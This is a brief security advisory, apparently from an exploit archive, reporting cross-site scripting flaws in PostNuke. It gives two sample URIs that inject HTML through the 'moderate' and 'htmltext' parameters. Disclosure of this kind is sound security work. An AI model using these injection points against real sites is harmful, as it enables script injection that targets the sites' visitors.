PostNuke Multiple Cross Site Scripting Vulnerabilities

PostNuke Multiple Cross Site Scripting Vulnerabilities

No exploit is required.

Sample exploit URI have been provided:
http://www.example.com/[DIR]/index.php?module=Comments&req=moderate&moderate=<center><h1>xss
http://www.example.com/PostNuke-0.760-RC4b/html/user.php?op=edituser&htmltext=<h1>xss